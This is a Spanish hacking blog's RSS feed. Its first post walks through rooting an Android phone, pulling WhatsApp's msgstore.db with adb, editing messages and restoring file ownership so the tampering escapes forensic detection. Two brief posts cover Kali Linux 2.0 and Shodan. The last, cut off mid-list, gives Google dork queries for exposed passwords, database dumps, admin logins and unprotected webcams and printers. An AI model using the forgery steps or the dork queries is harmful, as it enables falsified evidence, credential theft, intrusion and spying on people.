<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking &#8211; Emanuel Paxtian</title>
	<atom:link href="https://emanuelpaxtian.com/blog/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>https://emanuelpaxtian.com/blog</link>
	<description></description>
	<lastBuildDate>Sat, 03 Oct 2015 01:36:41 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
	<item>
		<title>Falsificar los mensajes de WhatsApp</title>
		<link>https://emanuelpaxtian.com/blog/falsificar-los-mensajes-de-whatsapp/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Sat, 03 Oct 2015 01:36:41 +0000</pubDate>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<guid isPermaLink="false">https://psoluciones.net/?p=953</guid>

					<description><![CDATA[WhatsApp es sin duda la aplicación de mensajería instantánea más utilizada en todo el mundo. Cada vez las conversaciones que se envían a través de este cliente de mensajería tienen&#8230;]]></description>
										<content:encoded><![CDATA[<p>WhatsApp es sin duda la aplicación de mensajería instantánea más utilizada en todo el mundo. Cada vez las conversaciones que se envían a través de este cliente de mensajería tienen un mayor valor, tanto personal para los usuarios como para piratas informáticos e incluso como pruebas en asuntos legales. Para proteger la seguridad e integridad de estas conversaciones, el equipo de WhatsApp ha aplicado varias medidas de seguridad tanto a las comunicaciones como a los historiales de chat que se guardan en el teléfono, aunque según parece estas medidas no son del todo eficaces.</p>
<p>Peritos informáticos han conseguido identificar y explotar el fallo de seguridad de WhatsApp, concretamente en la versión 2.12.250 ejecutada sobre dos sistemas Android 5.x y 4.4.x, que permite modificar la base de datos de WhatsApp para editar mensajes sin dejar rastro de la modificación.</p>
<p>WhatsApp utiliza para las conversaciones el software de bases de datos SQLite. WhatsApp en total utiliza dos bases de datos diferentes, la original, que se encuentra sin cifrar, y la copia de seguridad, la cual utiliza sistemas de criptografía simétrica junto al algoritmo AES de clave única para el cifrado y el descifrado de la misma. Mientras que la copia de datos está “protegida” y no nos interesa de momento, vamos a centrarnos en la base de datos original, la que utiliza el propio cliente de mensajería en tiempo real.</p>
<p>La base de datos que utiliza WhatsApp para mostrar las conversaciones en tiempo real en el propio cliente de mensajería se guarda en plano, sin cifrar como hemos dicho, aunque sí que se encuentra en un directorio de acceso limitado.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-958 size-full" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-modificada-655x544.jpg" alt="Captura-de-WhatsApp-conjunta-modificada-655x544" width="634" height="527" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-modificada-655x544.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-modificada-655x544-300x249.jpg 300w" sizes="(max-width: 634px) 100vw, 634px" /></p>
<h2>Descargar la base de datos de conversaciones de WhatsApp al PC</h2>
<p>Para poder modificar una conversación de WhatsApp lo primero que debemos hacer es tener permisos de root sobre el dispositivo. Una vez con estos permisos habilitados conectamos el smartphone a nuestro ordenador y, a través de la herramienta de desarrollo adb ejecutamos los siguientes comandos:</p>
<ul>
<li>adb devices (nos muestra los dispositivos conectados, útil para saber si todo funciona correctamente)</li>
<li>adb shell (nos abre un terminal para controlar el smartphone)</li>
</ul>
<p><img decoding="async" class="aligncenter size-full wp-image-954" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-1-655x331.jpg" alt="ADB-SQL-WhatsApp-1-655x331" width="634" height="320" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-1-655x331.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-1-655x331-300x151.jpg 300w" sizes="(max-width: 634px) 100vw, 634px" /></p>
<p>A continuación ejecutamos el comando “su” para conseguir permisos de superusuario en el dispositivo.</p>
<ul>
<li>su</li>
</ul>
<p>Con estos garantizados nos situamos sobre la ruta de las bases de datos de WhatsApp tecleando en el terminal o shell:</p>
<ul>
<li>cd /data/data/com.whatsapp/databases</li>
</ul>
<p>A continuación ejecutamos el comando ls -la para mostrar una lista con todos los archivos de dicho directorio. Si nos fijamos en esta lista, uno de los archivos se llamará msgstore.db. Este archivo contiene toda la base de datos de conversaciones de WhatsApp que se guardan automáticamente (y sin cifrar) cada vez que recibimos o enviamos un mensaje.</p>
<p>Una vez confirmado que tenemos el archivo de la base de datos en nuestro smartphone debemos copiarlo al ordenador. Para ello escribimos dos veces “exit” en el terminal para salir del shell y volver a Windows y desde allí tecleamos:</p>
<ul>
<li>adb pull /data/data/com.whatsapp/databases/msgstore.db</li>
</ul>
<p>El archivo se descarga a nuestro PC, a la misma ruta donde tenemos el binario de adb copiado. Todo listo. Ya podemos empezar a modificar los mensajes que queramos.</p>
<h2>Modificar la base de datos de conversaciones</h2>
<p>Una vez tenemos la base de datos en nuestro PC debemos descargarnos la aplicación <a href="http://sqlitestudio.pl/" target="_blank">SQLiteStudio </a>con la que la abriremos y modificaremos. Una vez tengamos el programa lo ejecutamos y cargamos la base de datos desde el menú Database -&gt; Add a database y nos conectamos a ella mediante el menú Database -&gt; Connect to the database.</p>
<p><img decoding="async" class="aligncenter size-full wp-image-956" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Base-de-datos-SQL-de-WhatsApp-655x351.jpg" alt="Base-de-datos-SQL-de-WhatsApp-655x351" width="634" height="340" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Base-de-datos-SQL-de-WhatsApp-655x351.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Base-de-datos-SQL-de-WhatsApp-655x351-300x161.jpg 300w" sizes="(max-width: 634px) 100vw, 634px" /></p>
<p>Una vez conectados a la base de datos veremos todas las tablas de la misma, aunque debemos centrarnos en dos:</p>
<ul>
<li>messages</li>
<li>messages_fts_content</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-962" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Tablas-base-de-datos-SQL-de-WhatsApp-655x353.jpg" alt="Tablas-base-de-datos-SQL-de-WhatsApp-655x353" width="634" height="342" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Tablas-base-de-datos-SQL-de-WhatsApp-655x353.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Tablas-base-de-datos-SQL-de-WhatsApp-655x353-300x162.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></p>
<p>Lo primero que debemos hacer es identificar la clave privada del mensaje. Para ello lanzamos una consulta a la base de datos con el siguiente comando:</p>
<ul>
<li>select * from messages where data LIKE “%mensaje%”; (sustituyendo mensaje por el contenido que queremos buscar)</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-957" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Buscar-mensaje-SQL-WhastApp-655x353.jpg" alt="Buscar-mensaje-SQL-WhastApp-655x353" width="634" height="342" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Buscar-mensaje-SQL-WhastApp-655x353.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Buscar-mensaje-SQL-WhastApp-655x353-300x162.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></p>
<p>Apuntamos en un papel o documento la clave privada del mensaje, o valor de la columna ID, para igualar los cambios en las dos tablas anteriores. A continuación, en la columna “data” de la table “messages” cambiamos el valor del mensaje que hemos enviado por el nuevo que queremos establecer.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-961" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-655x88.jpg" alt="Mensaje-WhatsApp-a-modificar-655x88" width="634" height="85" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-655x88.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-655x88-300x40.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></p>
<p>Una vez realizados los cambios que queremos pulsamos sobre el botón “commit” para que estos se apliquen y cambien en la base de datos.</p>
<p>La mitad del proceso ya está hecho. Ahora abrimos la tabla messages_fts_content y en el buscador introducimos la clave privada, o ID, que hemos anotado antes. Veremos una nueva fila con el contenido del mensaje, que aún no ha sido cambiado como el de la primera tabla.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-960" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-2-655x96.jpg" alt="Mensaje-WhatsApp-a-modificar-2-655x96" width="634" height="93" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-2-655x96.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Mensaje-WhatsApp-a-modificar-2-655x96-300x44.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></p>
<p>Lo seleccionamos y modificamos de igual forma, pero manteniendo el estilo original de la tabla:</p>
<ul>
<li>Todo el texto en minúsculas.</li>
<li>Las palabras separadas por tres espacios.</li>
<li>Los signos de puntuación separados de la palabra anterior por un espacio.</li>
</ul>
<p>Aunque este paso no es obligatorio es recomendable para dificultar aún más el poder saber que la tabla ha sido modificada. Ya tenemos todo listo. Ahora sólo nos queda volver a copiar la tabla a nuestro móvil.</p>
<h2>Copiar al teléfono la base de datos modificada de conversaciones de WhatsApp</h2>
<p>Una vez que hemos realizado los cambios anteriores en la base de datos es hora de subirla de nuevo al smartphone. Para ello abrimos de nuevo una ventana de MS-DOS y tecleamos:</p>
<ul>
<li>adb push msgstore.db /data/data/com.whatsapp/databases/msgstore.db</li>
</ul>
<p>La base de datos se ha subido correctamente a nuestro dispositivo, aunque hay un pequeño problema: los permisos.</p>
<p>Al haber subido una base de datos como usuario adb con permisos de superusuario, el propietario y el grupo de este archivo ahora es “root”. Si queremos borrar todo rastro de haber modificado dicha conversación tenemos que teclear en nuestro terminal:</p>
<ul>
<li>adb shell</li>
<li>su</li>
<li>cd /data/data/com.whatsapp/databases</li>
<li>ls –la</li>
<li>chown u0_a88:u0_a88 msgstore.db</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-955" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-2-655x333.jpg" alt="ADB-SQL-WhatsApp-2-655x333" width="634" height="322" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-2-655x333.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/ADB-SQL-WhatsApp-2-655x333-300x152.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></p>
<p>Todo listo. Ya podemos abrir nuestro WhatsApp de nuevo y ver cómo los mensajes que hemos enviado y recibido son diferentes. A simple vista es totalmente imposible saber si un mensaje es original o ha sido modificado y siguiendo un análisis forense tampoco es posible saberlo ya que los cambios no han dejado rastro ni en la base de datos ni en nuestro smartphone.</p>
<p><a title="" href="http://www.redeszone.net/app/uploads/2015/10/Captura-de-WhatsApp-conjunta-modificada.jpg" data-rel="lightbox[gallery-X1eE]"><span class="bttrlazyloading-wrapper bttrlazyloading-loaded"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-959" src="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-original-655x544.jpg" alt="Captura-de-WhatsApp-conjunta-original-655x544" width="634" height="527" srcset="https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-original-655x544.jpg 634w, https://emanuelpaxtian.com/blog/wp-content/uploads/2015/10/Captura-de-WhatsApp-conjunta-original-655x544-300x249.jpg 300w" sizes="auto, (max-width: 634px) 100vw, 634px" /></span></a></p>
<p>Según la finalidad que vayamos a dar a esto debemos tener en cuenta que es posible que estemos cometiendo un delito (por ejemplo para presentarlo como pruebas legales) y que siempre hay formas de detectar el engaño (por ejemplo mediante el análisis físico de los chips de memoria, quienes podrían demostrar que hay otro archivo “mstorage.db” que ha sido eliminado previamente.</p>
<p>Tomado de: www.redeszone.net</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Kali Linux 2.0 saldrá el 11 de agosto</title>
		<link>https://emanuelpaxtian.com/blog/kali-linux-2-0-saldra-el-11-de-agosto/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Mon, 27 Jul 2015 22:39:09 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<guid isPermaLink="false">https://psoluciones.net/?p=862</guid>

					<description><![CDATA[La famosa distribución GNU/Linux llamada Kali, muy conocida por su utilidad en el entorno de la seguridad, ya que contiene un sin fin de herramientas para realizar auditorías de seguridad,&#8230;]]></description>
										<content:encoded><![CDATA[<p>La famosa distribución <strong>GNU/Linux llamada Kali</strong>, muy conocida por su utilidad en el entorno de la seguridad, ya que contiene un sin fin de herramientas para realizar auditorías de seguridad, ahora llega a su segunda versión. Kali Linux 2.0 ya tiene puesta la fecha de lanzamiento y ésta es el 11 de agosto de este año.</p>
<p>Desde que en 2013 los desarrolladores de Backtrack decidieran dejar este proyecto en su versión 5r3 que estaba basada en Ubuntu, para darle un vuelco al proyecto y pasar a desarrollar Kali, este basado en Debian para mejorar su rendimiento y con un gran número de mejoras. Pues bien, este año veremos la aparición de la 2.0 después de casi 2 años.</p>
<p><strong>Kali Linux 2.0</strong> traerá mejoras como su interfaz gráfica, totalmente rediseñada para optimizar al máximo el trabajo, con nuevos menús y nuevas categorías para ordenar las numerosas herramientas que se incluyen. Igualmente pasa con las actualizaciones, que ahora serán semanales para mantenernos al día y su instalación será igual de sencilla que hasta ahora.</p>
<p>El <strong>framework Metasploit</strong> también ha tenido mejoras, al que le han añadido Ruby 2.0 de manera nativa para acelerar al máximo los tiempos de carga. Igualmente se incluirá un sistema de notificaciones en el escritorio para no perder detalle e incluso se han integrado mejores herramientas para grabar la pantalla y realizar videotutoriales.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>“Shodan” es el motor de búsqueda más terrorífico de Internet</title>
		<link>https://emanuelpaxtian.com/blog/shodan-es-el-motor-de-busqueda-mas-terrorifico-de-internet/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Sun, 26 Jul 2015 21:56:48 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>
		<guid isPermaLink="false">https://psoluciones.net/?p=844</guid>

					<description><![CDATA[Shodan es un motor de búsqueda que permite al usuario encontrar tipos específicos de equipos (routers, servidores, etc.) conectados a Internet a través de una variedad de filtros. Algunos también&#8230;]]></description>
										<content:encoded><![CDATA[<p>Shodan es un motor de búsqueda que permite al usuario encontrar tipos específicos de equipos (routers, servidores, etc.) conectados a Internet a través de una variedad de filtros. Algunos también lo han descrito como un motor de búsqueda de banners de servicios, que son meta-datos que el servidor envía de vuelta al cliente. Esto puede ser información sobre el software de servidor, ¿qué opciones admite el servicio, un mensaje de bienvenida o cualquier otra cosa que el cliente puede saber antes de interactuar con el servidor.</p>
<p>Shodan recoge datos sobre todo en los servidores web en el momento (HTTP puerto 80), pero también hay algunos datos de FTP (21), SSH (22) Telnet (23), SNMP (161) y SIP (5060) servicios.</p>
<p>Fue lanzado en 2009 por el informático John Matherly, quien, en 2003, concibió la idea de dispositivos conectados a Internet a buscar. El nombre Shodan es una referencia a SHODAN, un personaje del videojuego System Shock.<br />
(CNN) – “Cuando la gente no encuentra algo en Google, se cree que nadie lo puede encontrar. Eso es falso”.</p>
<p>La apreciación corresponde a John Matherly, creador de Shodan, el buscador más terrorífico de Internet.</p>
<p>A diferencia de Google, que se concentra en la búsqueda de sitios web, Shodan es una especie de buscador “oscuro” que detecta servidores, cámaras web, impresoras, routers y todo aquello que se conecta y forma Internet.</p>
<p>Shodan opera permanentemente y obtiene información de unos 500 millones de dispositivos y servicios conectados cada mes. Y los resultados de las búsquedas son sorprendentes: desde semáforos hasta cámaras de seguridad, pasando por sistemas de calefacción y crematorios.</p>
<p>Los usuarios de Shodan también han encontrado sistemas de control para un parque acuático y una estación de servicio. Y los investigadores en seguridad informática han localizado sistemas de comando y de control de plantas nucleares y un acelerador de partículas utilizando Shodan.</p>
<p>Pero lo que llama la atención de Shodan, y lo que lo hace tan escalofriante, es que muy pocos de estos dispositivos tienen restricciones de seguridad para acceder a ellos.</p>
<p>En mayo de 2013, CNN Money publicó un artículo que detalla cómo SHODAN se puede utilizar para encontrar sistemas peligrosas en Internet, incluyendo controles de semáforos. Muestran imágenes de esos sistemas, que proporcionaron la bandera de advertencia “La muerte puede ocurrir !!!” al conectarse.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Google Hacking usando la búsqueda avanzada de Google</title>
		<link>https://emanuelpaxtian.com/blog/google-hacking-usando-la-baosqueda-avanzada-de-google/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Thu, 18 Jun 2015 14:05:03 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://4d9bb706-google-hacking-presentation.gif</guid>

					<description><![CDATA[Google Hacking son t&#233;cnicas para hackear p&#225;ginas web o servidores usando la b&#250;squeda avanzada de Google como herramienta, con Google puede realizar busquedas muy precisas y esto es aprovechado para&#8230;]]></description>
										<content:encoded><![CDATA[<p>Google Hacking son t&eacute;cnicas para hackear p&aacute;ginas web o servidores usando la b&uacute;squeda avanzada de Google como herramienta, con Google puede realizar busquedas muy precisas y esto es aprovechado para poder encontrar sistemas debiles u obtener informac&oacute;n de cierto objetivo.</p>
<p><strong>El proceso que sigue un hacker tiene 7 pasos:</strong></p>
<ol>
<li>Localizar objetivo</li>
<li>Recopilar informaci&oacute;n sobre objetivo</li>
<li>Identificar vulnerabilidades</li>
<li>Explotar vulnerabilidades y acceder</li>
<li>Ataque</li>
<li>Borrado de huellas</li>
<li>Mantener el acceso, para futuras ocasiones</li>
</ol>
<p><span>Para hacer&nbsp;</span><strong>Google Hacking</strong><span>, tienes que conocer los&nbsp;</span><strong>operadores avanzados de b&uacute;squeda de Google o comandos de b&uacute;squeda avanzada de Google</strong><span>, que se pueden inclu&iacute;r en el recuadro normal de b&uacute;squedas individualmente o combinados entre s&iacute;</span></p>
<p>Aqu&iacute; van los principales<strong>comandos de b&uacute;squeda avanzada Google</strong>:</p>
<ul>
<li>&rdquo; &rdquo; (comillas): buscar frase exacta</li>
<li>and or not: operadores l&oacute;gicos &ldquo;y&rdquo; o &ldquo;no&rdquo;</li>
<li>+ y -: inclu&iacute;r y exclu&iacute;r. Ej: jaguar -coches: busca la palabra &ldquo;jaguar&rdquo;, pero omite las webs con la palabra &ldquo;coches&rdquo;</li>
<li>* (asterisco): comod&iacute;n, cualquier palabra, pero una s&oacute;la palabra</li>
<li>. (punto): comod&iacute;n, cualquier palabra, una o muchas</li>
<li>intitle o allintitle: la expresi&oacute;n buscada est&aacute; en el t&iacute;tulo</li>
<li>inurl o allinurl: la expresi&oacute;n buscada est&aacute; en la url</li>
<li>site: s&oacute;lo busca resultados dentro de la web que va detr&aacute;s de &ldquo;site:&rdquo;</li>
<li>filetype: s&oacute;lo busca archivos de un tipo (doc, xls, txt&hellip;)</li>
<li>link: s&oacute;lo busca en p&aacute;ginas que tienen un link a una determinada web</li>
<li>inanchor: s&oacute;lo busca en p&aacute;ginas que tienen en el texto de enlace la expresi&oacute;n buscada</li>
<li>cache: muestra el resultado en la cache de Google de una pagina web</li>
<li>related: busca webs relacionadas con una determinada</li>
</ul>
<p>Usando estos comandos podemos obtener una serie de informacion:</p>
<h1></h1>
<div class="entry-content article">
<p><strong>1) Ficheros con usuarios y contrase&ntilde;as</strong>: lo que permite al hacker entrar directamente en tu web. Ejemplos:</p>
<ul>
<li><em>ext:pwd inurl:(service | authors | administrators | users) &ldquo;# -FrontPage-&ldquo;</em>&nbsp;Usuarios y claves de administradores, para modificar la web. Se ven directamente en Google, sin necesidad de entrar en la p&aacute;gina. Hay m&aacute;s de 1.100 claves as&iacute; en Google</li>
<li><em>filetype:sql &ldquo;# dumping data for table&rdquo; &ldquo;`PASSWORD` varchar&rdquo;</em>&nbsp;Bases de datos sql volcadas completas, tienen datos de usuarios y contrase&ntilde;as. Se pueden hacer modificaciones en la cadena de b&uacute;squeda, para sacar otros tipos de informaci&oacute;n. Aqu&iacute; un ejemplo de contrase&ntilde;as de la Universidad de Vigo. Las contrase&ntilde;as van encriptadas en md5, pero basta buscar en Google la contrase&ntilde;a y el hacker encontrar&aacute; un foro donde alguien la ha desencriptado y sale la original. Pongo un recuadro negro en los e-mails&nbsp;&nbsp;</li>
<li><em>intitle:&rdquo;index of&rdquo; &ldquo;Index of /&rdquo; password.txt</em>&nbsp;Servidores con un archivo llamado password.txt. Se puede centrar por pa&iacute;ses con site:.es o por p&aacute;ginas educativas con site:.edu</li>
<li><em>filetype:inc intext:mysql_connect password -please -could -port</em>&nbsp;Google nos da m&aacute;s de 2.000 usuarios y contrase&ntilde;as de bases de datos MySQL</li>
<li><em>filetype:sql &ldquo;MySQL dump&rdquo; (pass|password|passwd|pwd)</em>&nbsp;M&aacute;s contrase&ntilde;as disponibles en bases de datos</li>
<li><em>&ldquo;there are no administrators accounts yet&rdquo; &ldquo;create the Super User&rdquo; inurl:admin.php</em>&nbsp;Instalaciones de php nuke a mitad de proceso, que nos piden que elijamos la contrase&ntilde;a de administrador.</li>
</ul>
<p><strong>2) P&aacute;ginas con formularios de acceso (t&iacute;pica ventana que te pide usuario y contrase&ntilde;a, para entrar)</strong>: lo que les permite realizar un ataque de diccionario (con listas de usuarios y contrase&ntilde;as m&aacute;s frecuente combinados). Y si no consigue entrar por ah&iacute; usar&aacute; la fuerza bruta: probando contrase&ntilde;as con un programa, hasta conseguir entrar. El hacker puede usar&nbsp;<a href="http://antoniogonzalezm.es/50-contrasenas-mas-utilizadas-top-50-passwords-y-brutus-remote-password-craker/" target="_blank">Brutus</a>&nbsp;u otros programas similares, para sacar las contrase&ntilde;as.</p>
<p>&nbsp;Ejemplos:</p>
<ul>
<li><em>&ldquo;You have requested access to a restricted area of our website. Please authenticate yourself to continue.&rdquo;</em>&nbsp;Puerta de entrada a la administraci&oacute;n de la web. Casi 7.000 webs salen en Google al hacer esta b&uacute;squeda.</li>
<li><em>inurl:&rdquo;:10000&Prime; webmin</em>&nbsp;Webmin es un programa que permite administrar v&iacute;a web remotamente un servidor linux por el puerto 10000, esta b&uacute;squeda nos da m&aacute;s de 5.000 servidores que lo tienen activado. Al pinchar nos pide usuario y contrase&ntilde;a</li>
<li><em>&ldquo;VNC Desktop&rdquo; inurl&rdquo;:5800&Prime;</em>&nbsp;VNC es un programa, que permite administrar remotamente la web y corre en el puerto 5800 por defecto. Similar al anterior.</li>
<li><em>intitle:&rdquo;vnc viewer for java&rdquo;</em>&nbsp;otra forma de acceder a gente que tiene instalado VNC. Google muestra 4.000 ordenarodres listos para administrar remotamente.</li>
<li><em>inurl:/admin/login.asp</em>&nbsp;Da al hacker 8 millones de p&aacute;ginas diferentes donde hacer login</li>
<li><em>allintitle:Outlook Web Access Logon</em>&nbsp;Login, que permite al hacker ver los correos de una empresa</li>
<li><em>&ldquo;best idea is to create the super user&rdquo; &ldquo;now by clicking here&rdquo;</em>&nbsp;Instalaci&oacute;n de php nuke a medias, que nos pide clave de administrador y lleva a formulario de acceso. M&aacute;s de 100.000 disponibles en Google.</li>
<li>Y el hacker puedes obtener millones de logins en sitios con WordPress yendo a la carpeta /wp-admin o en Joomla yendo a la carpeta /administrator, que son las carpetas que viene por defecto y casi nadie cambia</li>
</ul>
<p><strong>3) Ficheros con nombres de usuario o mensajes de error que revelan el nombre de usuario</strong>: esto se lo pone m&aacute;s sencillo al hacker para atacar con diccionarios o con&nbsp;<a href="http://antoniogonzalezm.es/50-contrasenas-mas-utilizadas-top-50-passwords-y-brutus-remote-password-craker/" target="_blank">Brutus</a>, ya s&oacute;lo tiene que sacar la contrase&ntilde;a para entrar, porque sabem el usuario. Ejemplos:</p>
<ul>
<li><em>&ldquo;access denied for user&rdquo; &ldquo;using password&rdquo; &ldquo;general error&rdquo; -inurl:phpbb &ldquo;sql error&rdquo;</em>&nbsp;Foros phpbb que dan errores. Nos dan el nombre del usuario y a veces tambi&eacute;n la IP del servidor. En Google aparecen m&aacute;s de 340.000 foros vulnerables.</li>
</ul>
<p><strong>4) Detecci&oacute;n de la versi&oacute;n servidor de la web o versiones productos vulnerables</strong>: si el servidor web, o alguno de los programas instalados en el mismo, no son la &uacute;ltima versi&oacute;n, casi siempre tienen agujeros de seguridad. Las versiones habitualmente salen para actualizar agujeros de seguridad. Basta buscar en Google el&nbsp;<strong>exploit</strong>, para poder entrar en el servidor. Un exploit es un &ldquo;programa&rdquo; o una manera de explotar la vulnerabilidad: hay millones en internet. El hacker encontrar&aacute; los exploits buscando en Google, en&nbsp;<a href="http://www.exploit-db.com/" target="_blank">Exploit Database</a>&nbsp;o dejando que&nbsp;<a href="http://www.metasploit.com/" target="_blank">MetaSploit Framework</a>&nbsp;los descubra y ejecute directamente. Ejemplos:</p>
<ul>
<li><em>&ldquo;SquirrelMail version 1.4.4&Prime; inurl:src ext:php</em>&nbsp;Una versi&oacute;n muy mala y f&aacute;clmente jaqueable del gestor de correo. En Goolge aparecen 1940 empresas con ese gestor de correo, es como si dicen: &ldquo;hack&eacute;ame, mira mis correos&rdquo;</li>
<li><em>&ldquo;Powered by MercuryBoard [v1&Prime;</em>&nbsp;Versi&oacute;n antigua y con agujeros de seguridad de este software para env&iacute;o de boletines. 188.000 resultados nos da Google.</li>
<li><em>intitle:&rdquo;Welcome to Windows Small Business Server 2003&Prime;</em>&nbsp;Google muestra 17.000 servidores con esta versi&oacute;n anticuada de Windows Server, el hacker no sabe por cu&aacute;l empezar&hellip;</li>
<li><em>intitle:index.of &ldquo;Apache/*&rdquo; &ldquo;server at&rdquo;</em>&nbsp;Da m&aacute;s de 500 millones de resultados en Google. Busca servidores Apache. Poniendo en lugar del * una versi&oacute;n con vulnerabilidades, el hacker sabe en qu&eacute; servidores puede entrar.</li>
<li><em>intitle:index.of &ldquo;Microsoft-IIS/* server at&rdquo;</em>&nbsp;Igual que el anterior, aunque este muestra &ldquo;s&oacute;lo&rdquo; 600.000 servidores, con sus versiones correspondientes.</li>
</ul>
<p><strong>5) Dispositivos hardware online (ver webcams y c&aacute;maras de vigilancia o manejar impresoras remotamente)</strong>. Con ellos puedes espiar remotamente (ejemplos en&nbsp;<a href="http://antoniogonzalezm.es/anonymjpg-cgi-permite-ver-todas-las-camaras-trendnet-remotamente/" target="_blank">&iquest;C&oacute;mo espiar webcams remotamente? 6 casos reales &iquest;Y c&oacute;mo protegerse?</a>), dar sustos imprimiendo archivos en impresoras ajenas, ver qu&eacute; se imprime en una empresa, manejar los sitemas de calefacci&oacute;n remotamente a tu antojo, etc. Ejemplos:</p>
<ul>
<li><em>camera linksys inurl:main.cgi</em>&nbsp;700 c&aacute;maras disponibles para que un hacker nos vea. No hace falta contrase&ntilde;a, para entrar</li>
<li><em>inurl:&rdquo;ViewerFrame?Mode=&rdquo;</em>&nbsp;83.000 c&aacute;maras disponibles para espiar sin necesidad de contrase&ntilde;a</li>
<li><em>&ldquo;active webcam page&rdquo; inurl:8080</em>&nbsp;M&aacute;s c&aacute;maras disponibles en el puerto 8080</li>
<li><em>intitle:&rdquo;toshiba network camera &ndash; User Login&rdquo;</em>&nbsp;15.000 c&aacute;maras m&aacute;s</li>
<li><em>intitle:&rdquo;ivista main page&rdquo;</em>&nbsp;m&aacute;s c&aacute;maras</li>
<li><em>intitle:&rdquo;i-catcher console&rdquo; &ldquo;please visit&rdquo;</em>&nbsp;y m&aacute;s todav&iacute;a</li>
<li><em>inurl:webarch/mainframe.cgi</em>&nbsp;Impresoras listas para administrar remotamente</li>
<li><em>intitle:&rdquo;network print server&rdquo; filetype:shtm</em>&nbsp;y m&aacute;s impresoras esperando a hackers</li>
</ul>
<p><strong>6) Ficheros con informaci&oacute;n sensible o directorios sensibles de un servidor</strong>. Ejemplos:</p>
<ul>
<li><em>&ldquo;phone&nbsp; * * *&rdquo; &ldquo;address *&rdquo; &ldquo;e-mail&rdquo; intitle:&rdquo;curriculum vitae&rdquo;</em>&nbsp;Obtenemos tel&eacute;fono, nombre, mail y direcci&oacute;n postal de m&aacute;s de m&aacute;s de 573.000 personas. Tambi&eacute;n se podr&iacute;a hacer el equivalente en espa&ntilde;ol.</li>
<li><em>filetype:ctt</em>&nbsp;Archivos con listas de e-mails. M&aacute;s de 4.000 archivos disponibles en Google.</li>
